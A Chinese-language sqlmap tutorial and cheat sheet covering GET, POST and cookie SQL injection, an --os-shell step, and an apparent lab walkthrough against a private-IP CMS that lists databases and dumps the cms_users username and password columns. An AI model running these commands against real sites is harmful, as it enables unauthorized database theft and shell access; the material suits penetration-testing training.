sqlmap 是kali 里面的工具
sqlmap对注入点注入
1 如果是 get 注入,直接,sqlmap -u "注入点网址".
2 如果是 post 注入,可以 sqlmap –r "burp 地址访问包”
3 如果是 cookie,X-Forwarded-For 等,可以访问的时候,用 burpsuite 抓包,注入处用号替 换,放到文件里,然后 sqlmap -r "文件地址",记得加上—level 3 参数
写入getshell
sqlmap -u "http://192.168.16.119/show.php?id=33" --os-shell
实战
注入点: cms权限
注入点:http://10.9.75.140/cms/show.php?id=33
sqlmap -u "http://10.9.75.140/cms/show.php?id=33"
#检测注入点
sqlmap -u "http://10.9.75.140/cms/show.php?id=33" --dbs
#列出所有的库名
sqlmap -u "http://10.9.75.140/cms/show.php?id=33" --current-db
#当前数据库的名字
sqlmap -u "http://10.9.75.140/cms/show.php?id=33" -D "cms" --tables
#指定目标数据库为cms&列出数据库中所有的表名
sqlmap -u "http://10.9.75.140/cms/show.php?id=33" -D "cms" -T "cms_users" --columns
#指定目标数据库为cms&指定目标表名为'cms_users'&列出所有的字段名
sqlmap -u "http://10.9.75.140/cms/show.php?id=33" -D "cms" -T "cms_users" -C "username,password" --dump
#指定目标数据库为cms&指定目标表名为'cms_users'&列出字段内容
更新
sudo apt-get update
sudo apt-get install sqlmap
重要参数
u | 检测注入点 |
–dbs | 列出所有的库名 |
–current-user | 当前连接数据库用户的名字 |
–current-db | 当前数据库的名字 |
-D “cms” –tables | 指定目标数据库为cms 列出数据库中所有的表名 |
-T “cms_users” | 指定目标表名为’cms_users’ |
–columns -C ‘username,password’ | 列出所有的字段名 指定目标字段 |
–dump -r | 列出字段内容 从文件中读取HTTP 请求 |
–os-shell | 在特定情况下,可以直接获得目标系统Shell |
–level 3 | 设置sqlmap 检测等级 3 |
–cookie=”username=admin” | 携带Cookie 信息进行注入 |
-g –batch | 利用google 搜索引擎自动搜索注入点 使用默认选项 |
–random-agent | 使用随机User-Agent 信息 |
-v 3 | 显示payload |